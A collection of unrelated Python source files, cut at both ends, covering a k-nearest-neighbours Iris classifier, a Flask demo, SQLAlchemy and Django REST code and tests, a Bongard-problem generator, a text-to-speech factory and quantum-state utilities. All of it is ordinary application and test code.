) -> str:
# Order the labeled points from nearest to farthest.
by_distance = sorted(
labeled_points,
key=lambda lp: distance(lp.point, new_point)
)
# Find the labels for the k closest.
k_nearest_labels = [lp.label for lp in by_distance[:k]]
# And let them vote.
return majority_vote(k_nearest_labels)
def parse_iris_row(row: List[str]) -> LabeledPoint:
"""
sepal_length, sepal_width, petal_length, petal_width, class
"""
measurements = [float(value) for value in row[:-1]]
# class if e.g. "Iris-virginica"; we just want "virginica"
try:
label = row[-1].split("-")[-1]
except:
breakpoint()
return LabeledPoint(measurements, label)
def main(argv: Optional[Sequence[str]] = None) -> int:
parser = argparse.ArgumentParser()
parser.add_argument("--dataset-path", required=True, type=str)
args = parser.parse_args(argv)
dataset_path = pathlib.Path(args.dataset_path)
if not dataset_path.is_absolute():
logging.error(f"'--dataset-path' must be absolute. {dataset_path=}.")
return 1
if dataset_path.exists():
logging.info(f"Using existing dataset at {dataset_path=}.")
else:
logging.info(f"Downloading Iris dataset to {dataset_path=}")
data = requests.get(
url="https://archive.ics.uci.edu/ml/machine-learning-databases/iris/iris.data",
)
with open(dataset_path, "w") as f:
f.write(data.text)
with open(dataset_path, "r") as f:
reader = csv.reader(f)
iris_data = [parse_iris_row(row) for row in reader if row]
# We'll also group just the points by species/label so we can plot them.
points_by_species: Dict[str, List[Vector]] = collections.defaultdict(list)
for iris in iris_data:
points_by_species[iris.label].append(iris.point)
# TODO(Jonathon): I'll skip plotting for now.
random.seed(12)
iris_train, iris_test = split_data(iris_data, 0.70)
iris_dataset_size = 150
assert len(iris_train) == 0.7 * iris_dataset_size
assert len(iris_test) == 0.3 * iris_dataset_size
# track how many times we see (predicted, actual)
confusion_matrix: Dict[Tuple[str, str], int] = collections.defaultdict(int)
num_correct = 0
for iris in iris_test:
predicted = knn_classify(5, iris_train, iris.point)
actual = iris.label
if predicted == actual:
num_correct += 1
confusion_matrix[(predicted, actual)] += 1
pct_correct = num_correct / len(iris_test)
logging.info(f"{pct_correct=}. {confusion_matrix=}")
return 0
if __name__ == "__main__":
raise SystemExit(main())
|
"""Utility functions only called by tests """
#%%
from natural_bm import dbm
from natural_bm import regularizers
#%%
def nnet_for_testing(nnet_type, W_reg_type=None, b_reg_type=None):
"""
This makes some small neural networks that are useful for testing.
# Arguments
nnet_type: Str; neural network identifier.
W_reg_type: Str or Regularizer; weight regularization.
b_reg_type: Str or Regularizer; bias regularization.
"""
if nnet_type == 'rbm':
layer_size_list = [10, 9]
topology_dict = {0: {1}}
elif nnet_type == 'dbm':
layer_size_list = [10, 9, 8]
topology_dict = {0: {1}, 1: {2}}
elif nnet_type == 'dbm_complex':
layer_size_list = [10, 9, 8, 7]
topology_dict = {0: {1, 3}, 1: {2}, 2: {3}}
else:
raise ValueError('Cannot recognize nnet_type input: {}'.format(nnet_type))
if W_reg_type is None:
W_regularizer = None
else:
W_regularizer = regularizers.get(W_reg_type)
if b_reg_type is None:
b_regularizer = None
else:
b_regularizer = regularizers.get(b_reg_type)
nnet = dbm.DBM(layer_size_list, topology_dict,
W_regularizer=W_regularizer, b_regularizer=b_regularizer)
return nnet
|
from flask import Flask, render_template
app = Flask(__name__)
@app.route('/')
def index():
return 'Здесь всё Ок! Но график синуса <a href="/sin/">дальше</a>.', 200
@app.route('/sin/')
def graph_sin():
return render_template('sin.html')
@app.errorhandler(404)
def page_not_found(error):
return 'Вы потерялись:( Но я вам <a href="/">помогу</a>!', 404
if __name__ == '__main__':
app.run()
|
"""Events keep an audit trail of all changes submitted to the datastore
"""
from sqlalchemy import and_, func
from . import db
from namex.exceptions import BusinessException
from marshmallow import Schema, fields, post_load
from datetime import datetime
from sqlalchemy.orm import backref
from sqlalchemy import cast, Date
from sqlalchemy.dialects.postgresql import JSONB
from datetime import datetime, timedelta
from ..constants import EventAction, EventUserId, EventState, RequestState, RequestPriority
class Event(db.Model):
__tablename__ = 'events'
id = db.Column(db.Integer, primary_key=True)
eventDate = db.Column('event_dt', db.DateTime(timezone=True), default=datetime.utcnow)
action = db.Column(db.String(1000))
jsonZip = db.Column('json_zip', db.Text)
eventJson = db.Column('event_json', JSONB)
# relationships
stateCd = db.Column('state_cd', db.String(20), db.ForeignKey('states.cd'))
state = db.relationship('State', backref=backref('state_events', uselist=False), foreign_keys=[stateCd])
nrId = db.Column('nr_id', db.Integer, db.ForeignKey('requests.id'))
userId = db.Column('user_id', db.Integer, db.ForeignKey('users.id'))
user = db.relationship('User', backref=backref('user_events', uselist=False), foreign_keys=[userId])
GET = 'get'
PUT = 'put'
PATCH = 'patch'
POST = 'post'
DELETE = 'DELETE'
UPDATE_FROM_NRO = 'update_from_nro'
NRO_UPDATE = 'nro_update'
MARKED_ON_HOLD = 'marked_on_hold'
SET_TO_DRAFT = 'set_to_draft'
NAMEX_PAY = 'namex_pay'
VALID_ACTIONS = [GET, PUT, PATCH, POST, DELETE]
def json(self):
return {"id": self.id, "eventDate": self.eventDate, "action": self.action, "stateCd": self.stateCd,
"jsonData": self.eventJson,
"requestId": self.nrId, "userId": self.userId}
def save_to_db(self):
db.session.add(self)
db.session.commit()
def save_to_session(self):
db.session.add(self)
def delete_from_db(self):
raise BusinessException()
@classmethod
def get_approved_names_counter(cls):
auto_approved_names_counter = db.session.query(
func.count(Event.id).label('approvedNamesCounter'))\
.filter(Event.action == Event.PATCH + 'Payment Completed')\
.filter(Event.userId == EventUserId.SERVICE_ACCOUNT.value)\
.filter(Event.stateCd.in_(('APPROVED','CONDITIONAL')))\
.filter(func.date_trunc('day', Event.eventDate) == func.date_trunc('day', func.now()))\
.all()
return auto_approved_names_counter.pop()
|
import pandas as pd
data = pd.read_csv("data/2016.csv")
df = pd.DataFrame(data)
df = df.replace('[Mæ(=)]', '', regex=True)
print(df)
df.to_csv("data/2022.csv", index=False)
|
import pandas as pd
df = pd.read_csv('all_me.csv')
df = df['Message']
all_text = []
for msg in df:
msg = str(msg)
if (('"channel_id":' not in msg) and '"user_id":' not in msg) and ('"users":' not in msg) and ('"chat_id":' not in msg) and ('"photo":' not in msg) and ('nan' != msg):
print(msg)
all_text.append(msg)
with open('msgs.txt', 'w') as f:
f.write("""
——————————————
""".join(all_text))
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# This work is licensed under the MIT License.
# To view a copy of this license, visit https://opensource.org/licenses/MIT
from bongard import LineAction, ArcAction, OneStrokeShape, BongardImage, BongardProblem, BongardImagePainter, \
BongardProblemPainter
from bongard.plot import create_visualized_bongard_problem
import numpy as np
import os
def create_triangle(start_coordinates, start_orientation):
triangle_actions = []
l = np.random.uniform(low=0.1, high=0.15)
# line_length is in [0, 1]
action_0 = LineAction(line_length=l, line_type="normal", turn_direction="R", turn_angle=120)
action_1 = LineAction(line_length=l, line_type="normal", turn_direction="R", turn_angle=120)
action_2 = LineAction(line_length=l, line_type="normal", turn_direction="R", turn_angle=120)
triangle_actions = [action_0, action_1, action_2]
scaling_factors = [np.random.uniform(280, 300) for _ in range(len(triangle_actions))]
shape = OneStrokeShape(basic_actions=triangle_actions, start_coordinates=start_coordinates,
start_orientation=start_orientation, scaling_factors=scaling_factors)
return shape
def create_circle(start_coordinates, start_orientation):
# arc_angle is in [-360, 360]
arc_radius = np.random.uniform(low=0.05, high=0.075)
action_0 = ArcAction(arc_angle=360, arc_type="normal", turn_direction="R",
turn_angle=0, arc_radius=arc_radius)
circle_actions = [action_0]
scaling_factors = [np.random.uniform(240, 250) for _ in range(len(circle_actions))]
shape = OneStrokeShape(basic_actions=circle_actions, start_coordinates=start_coordinates,
start_orientation=start_orientation, scaling_factors=scaling_factors)
return shape
def create_random_positive_image():
# In the positive images, all the triangles are horizontally aligned.
shapes = []
num_triangles = np.random.randint(4, 5)
num_circles = np.random.randint(6, 7)
x_mean = np.random.uniform(-300, 300)
triangle_ys = [-300 + 600 / num_triangles * i + np.random.uniform(-5, 5) for i in range(num_triangles)]
triangle_xs = [x_mean + np.random.uniform(-5, 5) for _ in range(num_triangles)]
def sample_circle_x(triangle_x_mean):
if np.random.uniform(-300, 300) < x_mean:
x = np.random.uniform(-300, triangle_x_mean - 50)
else:
x = np.random.uniform(triangle_x_mean + 50, 300)
return x
circle_xs = [sample_circle_x(triangle_x_mean=x_mean) for _ in range(num_circles)]
for i in range(num_triangles):
triangle = create_triangle(start_coordinates=(triangle_ys[i], triangle_xs[i]), start_orientation=120)
shapes.append(triangle)
for i in range(num_circles):
circle = create_circle(start_coordinates=(np.random.uniform(-300, 300), circle_xs[i]),
start_orientation=np.random.uniform(-360, 360))
shapes.append(circle)
bongard_image = BongardImage(one_stroke_shapes=shapes)
return bongard_image
def create_random_negative_image():
# In the negative images, all the triangles are vertically aligned.
shapes = []
num_triangles = np.random.randint(4, 5)
num_circles = np.random.randint(6, 7)
y_mean = np.random.uniform(-300, 300)
triangle_xs = [-300 + 600 / num_triangles * i + np.random.uniform(-5, 5) for i in range(num_triangles)]
triangle_ys = [y_mean + np.random.uniform(-5, 5) for _ in range(num_triangles)]
def sample_circle_y(triangle_y_mean):
if np.random.uniform(-300, 300) < y_mean:
y = np.random.uniform(-300, triangle_y_mean - 50)
else:
y = np.random.uniform(triangle_y_mean + 50, 300)
return y
circle_ys = [sample_circle_y(triangle_y_mean=y_mean) for _ in range(num_circles)]
for i in range(num_triangles):
triangle = create_triangle(start_coordinates=(triangle_ys[i], triangle_xs[i]), start_orientation=120)
shapes.append(triangle)
for i in range(num_circles):
circle = create_circle(start_coordinates=(circle_ys[i], np.random.uniform(-300, 300)),
start_orientation=np.random.uniform(-360, 360))
shapes.append(circle)
bongard_image = BongardImage(one_stroke_shapes=shapes)
return bongard_image
def create_bongard_problem():
bongard_problem_name = "Rectangle VS Circle"
# Typically Bongard program consists of seven images for positive images and negative images, respectively.
# The first six images would be used for "training", and the last image would be reserved for "test"
bongard_problem_positive_images = [create_random_positive_image() for _ in range(7)]
bongard_problem_negative_images = [create_random_negative_image() for _ in range(7)]
bongard_problem = BongardProblem(positive_bongard_images=bongard_problem_positive_images,
negative_bongard_images=bongard_problem_negative_images,
problem_name=bongard_problem_name, positive_rules=None,
negative_rules=None)
return bongard_problem
if __name__ == "__main__":
random_seed = 0
bongard_problem_ps_dir = "./demo/ps"
bongard_problem_png_dir = "./demo/png"
bongard_problem_vis_filepath = "./demo/bongard_demo.png"
if not os.path.exists(bongard_problem_ps_dir):
os.makedirs(bongard_problem_ps_dir)
if not os.path.exists(bongard_problem_png_dir):
os.makedirs(bongard_problem_png_dir)
np.random.seed(random_seed)
# Create an instance of Bongard problem based our design.
bongard_problem = create_bongard_problem()
# Use Bongard problem painter to draw Bongard problems.
# The Bongard problem painter supports creating Bongard problems whose image has at most two shapes.
bongard_problem_painter = BongardProblemPainter(random_seed=random_seed)
# The Bongard painter will automatically create Bongard problems in the specified directories.
# The Bongard images created will be save to hard drive
bongard_problem_painter.create_bongard_problem(bongard_problem=bongard_problem,
bongard_problem_ps_dir=bongard_problem_ps_dir,
bongard_problem_png_dir=bongard_problem_png_dir,
auto_position=False)
# Create a merged image for Bongard problem human-readable visualization, using the helper function.
create_visualized_bongard_problem(bongard_problem_dir=bongard_problem_png_dir,
bongard_problem_visualized_filepath=bongard_problem_vis_filepath)
|
class TTSFactory:
from text2speech.modules.espeak_tts import ESpeak
from text2speech.modules.espeakng_tts import ESpeakNG
from text2speech.modules.google_tts import GoogleTTS
from text2speech.modules.mary_tts import MaryTTS
from text2speech.modules.mimic_tts import Mimic
from text2speech.modules.spdsay_tts import SpdSay
from text2speech.modules.ibm_tts import WatsonTTS
from text2speech.modules.responsive_voice_tts import ResponsiveVoiceTTS
from text2speech.modules.mimic2_tts import Mimic2
from text2speech.modules.pico_tts import PicoTTS
from text2speech.modules.polly_tts import PollyTTS
from text2speech.modules.festival_tts import FestivalTTS
from text2speech.modules.voice_rss import VoiceRSSTTS
from text2speech.modules.mbrola_tts import MbrolaTTS
from text2speech.modules.mozilla_tts import MozillaTTSServer
CLASSES = {
"mimic": Mimic,
"mimic2": Mimic2,
"google": GoogleTTS,
"marytts": MaryTTS,
"espeak": ESpeak,
"espeak-ng": ESpeakNG,
"spdsay": SpdSay,
"watson": WatsonTTS,
"responsive_voice": ResponsiveVoiceTTS,
"polly": PollyTTS,
"pico": PicoTTS,
"festival": FestivalTTS,
"mbrola": MbrolaTTS,
"voicerss": VoiceRSSTTS,
"mozilla_server": MozillaTTSServer
}
@staticmethod
def create(tts_config=None):
"""
Factory method to create a TTS engine based on configuration.
The configuration file ``chatterbox.conf`` contains a ``tts`` section with
the name of a TTS module to be read by this method.
"tts": {
"module": <engine_name>
}
"""
tts_config = tts_config or {}
tts_module = tts_config.get("module", "google")
tts_config = tts_config.get(tts_module, {}) or\
tts_config.get('tts', {}).get(tts_module, {})
clazz = TTSFactory.CLASSES.get(tts_module)
tts = clazz(tts_config)
tts.validator.validate()
return tts
|
"""
Base finders
"""
import functools
from collections import namedtuple
from pathlib import Path
from demosys.conf import settings
from demosys.exceptions import ImproperlyConfigured
from demosys.utils.module_loading import import_string
FinderEntry = namedtuple('FinderEntry', ['path', 'abspath', 'exists'])
class BaseFileSystemFinder:
"""Base class for searching directory lists"""
settings_attr = None
def __init__(self):
if not hasattr(settings, self.settings_attr):
raise ImproperlyConfigured(
"Settings module don't define {}."
"This is required when using a FileSystemFinder.".format(self.settings_attr)
)
self.paths = getattr(settings, self.settings_attr)
def find(self, path: Path):
"""
Find a file in the path. The file may exist in multiple
paths. The last found file will be returned.
:param path: The path to find
:return: The absolute path to the file or None if not found
"""
# Update paths from settings to make them editable runtime
# This is only possible for FileSystemFinders
if getattr(self, 'settings_attr', None):
self.paths = getattr(settings, self.settings_attr)
path_found = None
for entry in self.paths:
abspath = entry / path
if abspath.exists():
path_found = abspath
return path_found
class BaseEffectDirectoriesFinder(BaseFileSystemFinder):
"""Base class for searching effect directories"""
directory = None
def __init__(self):
pass
def find(self, path: Path):
path = Path(self.directory) / Path(path)
return super().find(path)
@property
def paths(self):
from demosys.effects.registry import effects
return list(effects.get_dirs())
@functools.lru_cache(maxsize=None)
def get_finder(import_path):
"""
Get a finder class from an import path.
Raises ``demosys.core.exceptions.ImproperlyConfigured`` if the finder is not found.
This function uses an lru cache.
:param import_path: string representing an import path
:return: An instance of the finder
"""
Finder = import_string(import_path)
if not issubclass(Finder, BaseFileSystemFinder):
raise ImproperlyConfigured('Finder {} is not a subclass of core.finders.FileSystemFinder'.format(import_path))
return Finder()
|
from dependency_injection.decorators.autowired import autowired
from dependency_injection.decorators.autowired_enums import AutoWiredType
from dependency_injection.test_dependency_injection.injected_class1 import InjectedClass
from dependency_injection.test_dependency_injection.injected_class2 import InjectedClass2
class TestClassSinglecall:
@autowired(AutoWiredType.SINGLECALL)
def __init__(self, my_name: str, no_name: str, injected_class1: InjectedClass, injected_class2: InjectedClass2):
self.injected_class1 = injected_class1
self.my_name = my_name
def boo(self) -> str:
return self.injected_class1.foo('hello TestClassSinglecall')
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from ppdet.core.workspace import register, create
from .meta_arch import BaseArch
__all__ = ['SSD']
@register
class SSD(BaseArch):
"""
Single Shot MultiBox Detector, see https://arxiv.org/abs/1512.02325
Args:
backbone (nn.Layer): backbone instance
ssd_head (nn.Layer): `SSDHead` instance
post_process (object): `BBoxPostProcess` instance
"""
__category__ = 'architecture'
__inject__ = ['post_process']
def __init__(self, backbone, ssd_head, post_process):
super(SSD, self).__init__()
self.backbone = backbone
self.ssd_head = ssd_head
self.post_process = post_process
@classmethod
def from_config(cls, cfg, *args, **kwargs):
# backbone
backbone = create(cfg['backbone'])
# head
kwargs = {'input_shape': backbone.out_shape}
ssd_head = create(cfg['ssd_head'], **kwargs)
return {
'backbone': backbone,
"ssd_head": ssd_head,
}
def _forward(self):
# Backbone
body_feats = self.backbone(self.inputs)
# SSD Head
if self.training:
return self.ssd_head(body_feats, self.inputs['image'],
self.inputs['gt_bbox'],
self.inputs['gt_class'])
else:
preds, anchors = self.ssd_head(body_feats, self.inputs['image'])
bbox, bbox_num = self.post_process(preds, anchors,
self.inputs['im_shape'],
self.inputs['scale_factor'])
return bbox, bbox_num
def get_loss(self, ):
return {"loss": self._forward()}
def get_pred(self):
bbox_pred, bbox_num = self._forward()
output = {
"bbox": bbox_pred,
"bbox_num": bbox_num,
}
return output
|
import sys
BANNER_TEXT = "---------------- Starting Your Algo --------------------"
def get_command():
"""Gets input from stdin
"""
try:
ret = sys.stdin.readline()
except EOFError:
# Game parent process terminated so exit
debug_write("Got EOF, parent game process must have died, exiting for cleanup")
exit()
if ret == "":
# Happens if parent game process dies, so exit for cleanup,
# Don't change or starter-algo process won't exit even though the game has closed
debug_write("Got EOF, parent game process must have died, exiting for cleanup")
exit()
return ret
def send_command(cmd):
"""Sends your turn to standard output.
Should usually only be called by 'GameState.submit_turn()'
"""
sys.stdout.write(cmd.strip() + "\n")
sys.stdout.flush()
def debug_write(*msg):
"""Prints a message to the games debug output
Args:
* msg: The message to output
"""
#Printing to STDERR is okay and printed out by the game but doesn't effect turns.
sys.stderr.write(", ".join(map(str, msg)).strip() + "\n")
sys.stderr.flush()
|
#!/usr/bin/env python3
"""
Created on 14 Jul 2021
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
"""
from scs_core.data.recurring_period import RecurringPeriod
from scs_core.data.datetime import LocalizedDatetime
# --------------------------------------------------------------------------------------------------------------------
now = LocalizedDatetime.now()
print("day...")
period = RecurringPeriod.construct(1, 'D')
print(period)
print(' cron: %s' % period.cron(2))
print('aws_cron: %s' % period.aws_cron(2))
print("-")
print("hours...")
period = RecurringPeriod.construct(4, 'H')
print(period)
print(' cron: %s' % period.cron(2))
print('aws_cron: %s' % period.aws_cron(2))
print("-")
print("minutes...")
period = RecurringPeriod.construct(5, 'M')
print(period)
print(' cron: %s' % period.cron(2))
print('aws_cron: %s' % period.aws_cron(2))
|
import os
from django.conf import settings
from django.test import TestCase
from django.urls import reverse
from django.core.files.uploadedfile import SimpleUploadedFile
# from mixer.backend.django import mixer
from rest_framework.test import APITestCase, APIClient
from board.serializers import BoardSerializer, ListSerializer, CardSerializer
from board.models import Board, List, Card, Attachment
# from PIL import Image
from django.shortcuts import render, get_object_or_404
"""
BoardSerializer
CardSerializer:
serializer = CardSerializer(data={})
serializer.is_valid(): ==> True / False
serializer.save(): <=== Card instance from the db
ListSerializer:
AttachmentSerializer
"""
"""
TDD Approach:
------------
1. Write tests for the functionality you want to implement
2. Run the tests, see them fail
3. Write / implement code for the functionality
4. Run tests to make sure they're passing
"""
class BoardSerializerTest(TestCase):
def setUp(self):
self.board_data = {
"name": "Test Board Name",
"description": "Some board created during testing"
}
def test_is_valid(self):
serializer = BoardSerializer(data=self.board_data)
self.assertTrue(serializer.is_valid())
board = serializer.save()
db_board = Board.objects.first()
self.assertEqual(board, db_board)
for field, value in self.board_data.items():
self.assertEqual(value, getattr(db_board, field))
# test for the date field
self.assertTrue("date", hasattr(db_board, "date"))
self.assertIsNotNone(db_board.date)
def test_invalid(self):
# missing name field
del self.board_data["name"]
serializer = BoardSerializer(data=self.board_data)
self.assertFalse(serializer.is_valid())
class ListSerializerTest(TestCase):
def setUp(self):
# board_author = User.objects.create(username="tester")
board = Board.objects.create(
name="Test Name", description="Some testing board")
self.list_data = {
"title": "Some title of a list created during testing",
"board": board.pk
}
def test_is_valid(self):
serializer = ListSerializer(data=self.list_data)
self.assertTrue(serializer.is_valid())
list = serializer.save()
db_list = List.objects.first()
self.assertEqual(list, db_list)
self.assertEqual(db_list.title, self.list_data["title"])
self.assertEqual(db_list.board.pk, self.list_data["board"])
# test for the created_at field
self.assertTrue("created_at", hasattr(db_list, "created_at"))
self.assertIsNotNone(db_list.created_at)
def test_invalid(self):
del self.list_data["title"]
serializer = ListSerializer(data=self.list_data)
self.assertFalse(serializer.is_valid())
class CardSerializerTest(TestCase):
def setUp(self):
# create a list
self.card_data = {
"description": "Some board created during testing"
}
def test_is_valid(self):
serializer = CardSerializer(data=self.card_data)
self.assertTrue(serializer.is_valid())
card = serializer.save()
db_card = Card.objects.first()
self.assertEqual(card, db_card)
for field, value in self.card_data.items():
self.assertEqual(value, getattr(db_card, field))
# test for the date field
self.assertTrue(hasattr(db_card, "created_at"))
self.assertIsNotNone(db_card.created_at)
def test_invalid(self):
# missing name field
serializer = CardSerializer(data=self.card_data)
self.assertFalse(serializer.is_valid())
class BoardViewTest(APITestCase):
def setUp(self):
self.client = APIClient()
self.board_data = {
"name": "Test Board",
"description": "Some board description test"
}
# create(name="", description="")
self.DATETIME_FORMAT = settings.REST_FRAMEWORK['DATETIME_FORMAT']
self.board = Board.objects.create(**self.board_data)
def test_get_all_boards(self):
"""
Tests that all boards can be fetched on route: /api/boards/ -- LIST (GET)
"""
response = self.client.get(reverse("board:boards"))
self.assertTrue(response.json()["success"])
self.assertEqual(response.status_code, 200)
response_boards = response.json()["boards"]
# import pdb
# pdb.set_trace()
for board in response_boards:
db_board = Board.objects.get(name=board["name"])
for key, value in board.items():
if key == "date":
self.assertEqual(value, getattr(
db_board, key).strftime(self.DATETIME_FORMAT))
continue
self.assertEqual(value, getattr(db_board, key))
def test_create_board(self):
"""
Tests for route: /api/boards/ -- POST
"""
data = {
"name": "Board name",
"description": "Board description"
}
response = self.client.post(reverse("board:boards"), data=data)
self.assertEqual(response.status_code, 201)
self.assertTrue(response.json()["success"])
db_board = Board.objects.get(name=data["name"])
self.assertEqual(data["name"], db_board.name)
self.assertEqual(data["description"], db_board.description)
response_board = response.json()["board"]
self.assertEqual(data["name"], response_board["name"])
self.assertEqual(data["description"], response_board["description"])
def test_get_a_single_board(self):
"""
Tests that a single board can be fetched on route: /api/boards/<int:pk>/
"""
# Create a board [Done]
# hit the endpoint with the board's pk on /api/boards/<int:pk>/
# Assert the content
response = self.client.get(
reverse("board:board-detail", args=(self.board.pk,)))
self.assertEqual(response.status_code, 200)
for field, value in self.board_data.items():
self.assertEqual(value, getattr(self.board, field))
def test_update_a_single_board(self):
"""
Test that a single board can be updated on route: /api/boards/<int:pk>/
"""
update_data = {
"name": "James"
}
response = self.client.put(
reverse("board:board-detail", args=(self.board.pk,)), data=update_data)
self.assertEqual(response.status_code, 200)
self.board.refresh_from_db()
self.assertEqual(update_data['name'], self.board.name)
def test_delete_a_single_board(self):
"""
Test that a single board can be deleted on route: /api/boards/<int:pk>/
"""
response = self.client.delete(
reverse("board:board-detail", args=(self.board.pk,)))
self.assertEqual(response.status_code, 204)
with self.assertRaises(Board.DoesNotExist):
# Raise does not exist
Board.objects.get(name=self.board_data["name"])
class AttachmentViewTest(APITestCase):
def setUp(self):
self.client = APIClient()
attachment_path = os.path.join(
settings.BASE_DIR, "board", "tests", "resources", "FJ9zqiRWQAImHie.jpeg")
image = open(attachment_path, "rb")
file = SimpleUploadedFile(image.name, image.read())
self.attachment_data = {
"file": "FJ9zqiRWQAImHie.jpeg",
"type": 'image'
}
self.attachment = Attachment.objects.create(**self.attachment_data)
def test_get_all_attachment(self):
"""
Tests that all boards can be fetched on route: /api/boards/ -- LIST (GET)
"""
# import pdb; pdb.set_trace()
response = self.client.get(reverse("board:attachments"))
self.assertTrue(response.json()["success"])
self.assertEqual(response.status_code, 200)
# import pdb
# pdb.set_trace()
# response_attachments = response.json()["attachments"]
# for attachment in response_attachments:
# db_attachment = Attachment.objects.first()
# for key, value in attachment.items():
# self.assertEqual(value, getattr(db_attachment, key))
def test_create_attachment(self):
image = open(
r"/Users/peedor/Desktop/git/pee/urgent/tw-ko/backend/board/tests/resources/FJ9zqiRWQAImHie.jpeg", "rb")
file = SimpleUploadedFile(
image.name, image.read(), content_type='multipart/form-data')
data = {
"file": file,
"type": "image"
}
response = self.client.post(
reverse("board:attachments"), data=data, format='multipart')
self.assertEqual(response.status_code,
201)
# import pdb
# pdb.set_trace()
self.assertTrue(response.json()["success"])
db_attachment = Attachment.objects.get(
file=data["file"], type=data["type"])
self.assertEqual(data["type"], db_attachment.type)
self.assertEqual(data["file"], db_attachment.file)
response_attachment = response.json()
self.assertEqual(data.get(type), response_attachment.get(type))
self.assertEqual(data.get(file), response_attachment.get(file))
def test_get_a_single_attachment(self):
"""
Tests that a single board can be fetched on route: /api/boards/<int:pk>/
"""
# Create a board [Done]
# hit the endpoint with the board's pk on /api/boards/<int:pk>/
# Assert the content
response = self.client.get(
reverse("board:attachment-detail", args=(self.attachment.pk,)))
self.assertEqual(response.status_code, 200)
for field, value in self.attachment_data.items():
self.assertEqual(value, getattr(self.attachment, field))
def test_delete_a_single_attachment(self):
"""
Test that a single board can be deleted on route: /api/boards/<int:pk>/
"""
response = self.client.delete(
reverse("board:attachment-detail", args=(self.attachment.pk,)))
self.assertEqual(response.status_code, 204)
with self.assertRaises(Attachment.DoesNotExist):
# Raise does not exist
Attachment.objects.get(file=self.attachment_data["file"])
class ListViewTest(APITestCase):
def setUp(self):
self.client = APIClient()
self.board_data = {
"name": "Test Board",
"description": "Some board description test"
}
# create(name="", description="")
self.DATETIME_FORMAT = settings.REST_FRAMEWORK['DATETIME_FORMAT']
self.board = Board.objects.create(**self.board_data)
self.list_data = {
"id": 3,
"title": "Black board",
"created_at": "2021-12-22T12:42:50.191263Z",
"board": self.board
}
# create(name="", description="")
self.list = List.objects.create(**self.list_data)
def test_get_all_lists(self):
"""
Tests that all boards can be fetched on route: /api/boards/ -- LIST (GET)
"""
response = self.client.get(reverse("board:list"))
self.assertTrue(response.json()["success"])
self.assertEqual(response.status_code, 200)
# response_lists = response.json()["lists"]
# for list in response_lists:
# db_list = List.objects.get(title=list["title"])
# for key, value in list.items():
# if key == "date":
# self.assertEqual(value, getattr(
# db_list, key).strftime(self.DATETIME_FORMAT))
# continue
# self.assertEqual(value, getattr(db_list, key))
def test_create_list(self):
"""
Tests for route: /api/boards/ -- POST
"""
self.board_data = {
"name": "Test Board",
"description": "Some board description test"
}
# create(name="", description="")
self.DATETIME_FORMAT = settings.REST_FRAMEWORK['DATETIME_FORMAT']
self.board = Board.objects.create(**self.board_data)
data = {
"title": "List title",
"board": self.board.pk
}
response = self.client.post(reverse("board:lists"), data=data)
self.assertEqual(response.status_code, 201)
self.assertTrue(response.json()["success"])
db_lists = List.objects.get(title=data["title"])
self.assertEqual(data["title"], db_lists.title)
self.assertEqual(data["board"], db_lists.board.pk)
response_list = response.json()["lists"]
self.assertEqual(data["title"], response_list["title"])
self.assertEqual(data["board"], response_list["board"])
def test_get_a_single_list(self):
"""
Tests that a single board can be fetched on route: /api/boards/<int:pk>/
"""
# Create a board [Done]
# hit the endpoint with the board's pk on /api/boards/<int:pk>/
# Assert the content
response = self.client.get(
reverse("board:list-detail", args=(self.list.pk,)))
self.assertEqual(response.status_code, 200)
# for field, value in self.list_data.items():
# self.assertEqual(value, getattr(self.list, field))
def test_update_a_single_list(self):
"""
Test that a single board can be updated on route: /api/boards/<int:pk>/
"""
self.board_data = {
"name": "Test Board",
"description": "Some board description test"
}
# create(name="", description="")
self.DATETIME_FORMAT = settings.REST_FRAMEWORK['DATETIME_FORMAT']
self.board = Board.objects.create(**self.board_data)
update_data = {
"title": "An edited list",
"board": self.board.pk
}
response = self.client.put(
reverse("board:list-detail", args=(self.list.pk,)), data=update_data)
self.assertEqual(response.status_code, 200)
self.list.refresh_from_db()
self.assertEqual(update_data['title'], self.list.title)
def test_delete_a_single_list(self):
"""
Test that a single board can be deleted on route: /api/boards/<int:pk>/
"""
response = self.client.delete(
reverse("board:list-detail", args=(self.list.pk,)))
self.assertEqual(response.status_code, 204)
with self.assertRaises(List.DoesNotExist):
# Raise does not exist
List.objects.get(title=self.list_data["title"])
|
class Solution:
def firstUniqChar(self, s: str) -> int:
uniq = {}
for ch in s:
if ch in uniq:
uniq[ch] = False
else:
uniq[ch] = True
for i, ch in enumerate(s):
if uniq[ch]:
return i
return -1
|
import numpy as np
from scipy.signal import hilbert
from numpy.linalg import eigh, inv
from operators import *
import scipy.sparse as ssp
import matplotlib as mpl
import scipy.linalg as sla
import scipy.signal
from time import gmtime
import json
import matplotlib.pyplot as plt
mpl.rcParams['figure.figsize'] = 16, 9
# TODO: Epsilon reconstruction search (100 values)
# Error metric for reconstructions (RMSE?)
def dict_write(path, rdict):
"""
Writes a dictionary to a text file at location <path>
"""
date = gmtime()
name = "{}_{}_{}_{}_{}_{}".format(date.tm_year,date.tm_mon, date.tm_mday, date.tm_hour, date.tm_min, date.tm_sec)
# convert everything to a fucking string
for key in rdict:
rdict[key] = str(rdict[key])
# write to file
with open(path+name+".json", 'a') as file:
json.dump(rdict, file)
return name
# define rectangular function centered at 0 with width equal to period
def rect(period, time):
return np.where(np.abs(time) <= period/2, 1, 0)
# hyperbolic secant
def sech(x):
return 1/np.cosh(x)
def remap(state):
"""
converts a quantum state to bloch vector
"""
mstate = np.matrix(state)
rho = np.outer(mstate.H, mstate)
u = 2*np.real(rho[0, 1])
v = 2*np.imag(rho[1, 0])
w = np.real(rho[0, 0] - rho[1, 1])
return [u, v, w]
def conjt(A):
"""
returns conjugate transpose of A
"""
return np.conj(np.transpose(A))
def normalisedQ(state):
"""
Checks if an input state is correctly normalised
"""
# check if vector or operator
if np.shape(state)[0] == np.shape(state)[1]:
return np.isclose(np.trace(state), 1.0)
else:
# compute sum of probability distribution
psum = 0.0
for i in state:
